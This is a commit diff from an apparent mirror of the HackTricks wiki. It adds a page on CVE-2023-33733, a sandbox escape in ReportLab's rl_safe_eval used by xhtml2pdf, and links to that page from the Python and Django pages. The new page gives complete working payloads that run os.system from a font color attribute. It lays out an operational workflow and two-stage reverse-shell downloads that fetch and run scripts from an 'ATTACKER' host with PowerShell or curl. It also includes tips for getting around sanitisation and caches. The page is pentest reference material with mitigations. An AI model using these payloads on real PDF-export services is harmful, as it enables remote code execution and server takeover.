mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Add content from: University (HTB): Exploiting ReportLab CVE‑2023‑33733 to gai...
- Remove searchindex.js (auto-generated file)
This commit is contained in:
		
							parent
							
								
									7b609aef63
								
							
						
					
					
						commit
						fdb533d0f7
					
				| @ -70,6 +70,7 @@ | |||||||
| - [Python Sandbox Escape & Pyscript](generic-methodologies-and-resources/python/README.md) | - [Python Sandbox Escape & Pyscript](generic-methodologies-and-resources/python/README.md) | ||||||
|   - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md) |   - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md) | ||||||
|     - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md) |     - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md) | ||||||
|  |     - [Reportlab Xhtml2pdf Triple Brackets Expression Evaluation Rce Cve 2023 33733](generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md) | ||||||
|   - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md) |   - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md) | ||||||
|   - [Keras Model Deserialization Rce And Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md) |   - [Keras Model Deserialization Rce And Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md) | ||||||
|   - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md) |   - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md) | ||||||
|  | |||||||
| @ -136,6 +136,14 @@ df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')") | |||||||
| df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')") | df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')") | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
|  | Also see a real-world sandboxed evaluator escape in PDF generators: | ||||||
|  | 
 | ||||||
|  | - ReportLab/xhtml2pdf triple-bracket [[[...]]] expression evaluation → RCE (CVE-2023-33733). It abuses rl_safe_eval to reach function.__globals__ and os.system from evaluated attributes (for example, font color) and returns a valid value to keep rendering stable. | ||||||
|  | 
 | ||||||
|  | {{#ref}} | ||||||
|  | reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md | ||||||
|  | {{#endref}} | ||||||
|  | 
 | ||||||
| ## Operators and short tricks | ## Operators and short tricks | ||||||
| 
 | 
 | ||||||
| ```python | ```python | ||||||
| @ -1147,5 +1155,8 @@ will be bypassed | |||||||
| - [https://gynvael.coldwind.pl/n/python_sandbox_escape](https://gynvael.coldwind.pl/n/python_sandbox_escape) | - [https://gynvael.coldwind.pl/n/python_sandbox_escape](https://gynvael.coldwind.pl/n/python_sandbox_escape) | ||||||
| - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html) | - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html) | ||||||
| - [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) | - [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) | ||||||
|  | - [CVE-2023-33733 (ReportLab rl_safe_eval expression evaluation RCE) – NVD](https://nvd.nist.gov/vuln/detail/cve-2023-33733) | ||||||
|  | - [c53elyas/CVE-2023-33733 PoC and write-up](https://github.com/c53elyas/CVE-2023-33733) | ||||||
|  | - [0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE](https://0xdf.gitlab.io/2025/08/09/htb-university.html) | ||||||
| 
 | 
 | ||||||
| {{#include ../../../banners/hacktricks-training.md}} | {{#include ../../../banners/hacktricks-training.md}} | ||||||
|  | |||||||
| @ -0,0 +1,79 @@ | |||||||
|  | # ReportLab/xhtml2pdf [[[...]]] expression-evaluation RCE (CVE-2023-33733) | ||||||
|  | 
 | ||||||
|  | {{#include ../../../banners/hacktricks-training.md}} | ||||||
|  | 
 | ||||||
|  | This page documents a practical sandbox escape and RCE primitive in ReportLab’s rl_safe_eval used by xhtml2pdf and other PDF-generation pipelines when rendering user-controlled HTML into PDFs. | ||||||
|  | 
 | ||||||
|  | CVE-2023-33733 affects ReportLab versions up to and including 3.6.12. In certain attribute contexts (for example color), values wrapped in triple brackets [[[ ... ]]] are evaluated server-side by rl_safe_eval. By crafting a payload that pivots from a whitelisted builtin (pow) to its Python function globals, an attacker can reach the os module and execute commands. | ||||||
|  | 
 | ||||||
|  | Key points | ||||||
|  | - Trigger: inject [[[ ... ]]] into evaluated attributes such as <font color="..."> within markup parsed by ReportLab/xhtml2pdf. | ||||||
|  | - Sandbox: rl_safe_eval replaces dangerous builtins but evaluated functions still expose __globals__. | ||||||
|  | - Bypass: craft a transient class Word to bypass rl_safe_eval name checks and access the string "__globals__" while avoiding blocked dunder filtering. | ||||||
|  | - RCE: getattr(pow, Word("__globals__"))["os"].system("<cmd>") | ||||||
|  | - Stability: Return a valid value for the attribute after execution (for color, use and 'red'). | ||||||
|  | 
 | ||||||
|  | When to test | ||||||
|  | - Applications that expose HTML-to-PDF export (profiles, invoices, reports) and show xhtml2pdf/ReportLab in PDF metadata or HTTP response comments. | ||||||
|  |   - exiftool profile.pdf | egrep 'Producer|Title|Creator' → "xhtml2pdf" producer | ||||||
|  |   - HTTP response for PDF often starts with a ReportLab generator comment | ||||||
|  | 
 | ||||||
|  | How the sandbox bypass works | ||||||
|  | - rl_safe_eval removes or replaces many builtins (getattr, type, pow, ...) and applies name filtering to deny attributes starting with __ or in a denylist. | ||||||
|  | - However, safe functions live in a globals dictionary accessible as func.__globals__. | ||||||
|  | - Use type(type(1)) to recover the real builtin type function (bypassing ReportLab’s wrapper), then define a Word class derived from str with mutated comparison behavior so that: | ||||||
|  |   - .startswith('__') → always False (bypass name startswith('__') check) | ||||||
|  |   - .__eq__ returns False only at first comparison (bypass denylist membership checks) and True afterwards (so Python getattr works) | ||||||
|  |   - .__hash__ equals hash(str(self)) | ||||||
|  | - With this, getattr(pow, Word('__globals__')) returns the globals dict of the wrapped pow function, which includes an imported os module. Then: ['os'].system('<cmd>'). | ||||||
|  | 
 | ||||||
|  | Minimal exploitation pattern (attribute example) | ||||||
|  | Place payload inside an evaluated attribute and ensure it returns a valid attribute value via boolean and 'red'. | ||||||
|  | 
 | ||||||
|  | <para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('ping 10.10.10.10') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'"> | ||||||
|  |   exploit | ||||||
|  | </font></para> | ||||||
|  | 
 | ||||||
|  | - The list-comprehension form allows a single expression acceptable to rl_safe_eval. | ||||||
|  | - The trailing and 'red' returns a valid CSS color so the rendering doesn’t break. | ||||||
|  | - Replace the command as needed; use ping to validate execution with tcpdump. | ||||||
|  | 
 | ||||||
|  | Operational workflow | ||||||
|  | 1) Identify PDF generator | ||||||
|  |    - PDF Producer shows xhtml2pdf; HTTP response contains ReportLab comment. | ||||||
|  | 2) Find an input reflected into the PDF (e.g., profile bio/description) and trigger an export. | ||||||
|  | 3) Verify execution with low-noise ICMP | ||||||
|  |    - Run: sudo tcpdump -ni <iface> icmp | ||||||
|  |    - Payload: ... system('ping <your_ip>') ... | ||||||
|  |    - Windows often sends exactly four echo requests by default. | ||||||
|  | 4) Establish a shell | ||||||
|  |    - For Windows, a reliable two-stage approach avoids quoting/encoding issues: | ||||||
|  |      - Stage 1 (download): | ||||||
|  | 
 | ||||||
|  | <para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -c iwr http://ATTACKER/rev.ps1 -o rev.ps1') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para> | ||||||
|  | 
 | ||||||
|  |      - Stage 2 (execute): | ||||||
|  | 
 | ||||||
|  | <para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell ./rev.ps1') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para> | ||||||
|  | 
 | ||||||
|  |    - For Linux targets, similar two-stage with curl/wget is possible: | ||||||
|  |      - system('curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s') | ||||||
|  | 
 | ||||||
|  | Notes and tips | ||||||
|  | - Attribute contexts: color is a known evaluated attribute; other attributes in ReportLab markup may also evaluate expressions. If one location is sanitized, try others rendered into the PDF flow (different fields, table styles, etc.). | ||||||
|  | - Quoting: Keep commands compact. Two-stage downloads drastically reduce quoting and escaping headaches. | ||||||
|  | - Reliability: If exports are cached or queued, slightly vary the payload (e.g., random path or query) to avoid hitting caches. | ||||||
|  | 
 | ||||||
|  | Mitigations and detection | ||||||
|  | - Upgrade ReportLab to 3.6.13 or later (CVE-2023-33733 fixed). Track security advisories in distro packages as well. | ||||||
|  | - Do not feed user-controlled HTML/markup directly into xhtml2pdf/ReportLab without strict sanitization. Remove/deny [[[...]]] evaluation constructs and vendor-specific tags when input is untrusted. | ||||||
|  | - Consider disabling or wrapping rl_safe_eval usage entirely for untrusted inputs. | ||||||
|  | - Monitor for suspicious outbound connections during PDF generation (e.g., ICMP/HTTP from app servers when exporting documents). | ||||||
|  | 
 | ||||||
|  | References | ||||||
|  | - PoC and technical analysis: [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733) | ||||||
|  | - 0xdf University HTB write-up (real-world exploitation, Windows two-stage payloads): [HTB: University](https://0xdf.gitlab.io/2025/08/09/htb-university.html) | ||||||
|  | - NVD entry (affected versions): [CVE-2023-33733](https://nvd.nist.gov/vuln/detail/cve-2023-33733) | ||||||
|  | - xhtml2pdf docs (markup/page concepts): [xhtml2pdf docs](https://xhtml2pdf.readthedocs.io/en/latest/format_html.html) | ||||||
|  | 
 | ||||||
|  | {{#include ../../../banners/hacktricks-training.md}} | ||||||
| @ -37,6 +37,15 @@ The same gadget works for **Debug Toolbar** or **Django-CMS** template rendering | |||||||
| 
 | 
 | ||||||
| --- | --- | ||||||
| 
 | 
 | ||||||
|  | ### Also see: ReportLab/xhtml2pdf PDF export RCE | ||||||
|  | Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval may evaluate expressions inside triple brackets `[[[ ... ]]]` enabling code execution (CVE-2023-33733). Details, payloads, and mitigations: | ||||||
|  | 
 | ||||||
|  | {{#ref}} | ||||||
|  | ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md | ||||||
|  | {{#endref}} | ||||||
|  | 
 | ||||||
|  | --- | ||||||
|  | 
 | ||||||
| ## Pickle-Backed Session Cookie RCE | ## Pickle-Backed Session Cookie RCE | ||||||
| If the setting `SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'` is enabled (or a custom serializer that deserialises pickle), Django *decrypts and unpickles* the session cookie **before** calling any view code. Therefore, possessing a valid signing key (the project `SECRET_KEY` by default) is enough for immediate remote code execution. | If the setting `SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'` is enabled (or a custom serializer that deserialises pickle), Django *decrypts and unpickles* the session cookie **before** calling any view code. Therefore, possessing a valid signing key (the project `SECRET_KEY` by default) is enough for immediate remote code execution. | ||||||
| 
 | 
 | ||||||
| @ -75,5 +84,6 @@ Always fingerprint the exact framework version via the `X-Frame-Options` error p | |||||||
| ## References | ## References | ||||||
| * Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025.  | * Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025.  | ||||||
| * OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024.  | * OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024.  | ||||||
|  | * 0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD – [https://0xdf.gitlab.io/2025/08/09/htb-university.html](https://0xdf.gitlab.io/2025/08/09/htb-university.html) | ||||||
| 
 | 
 | ||||||
| {{#include ../../banners/hacktricks-training.md}} | {{#include ../../banners/hacktricks-training.md}} | ||||||
|  | |||||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user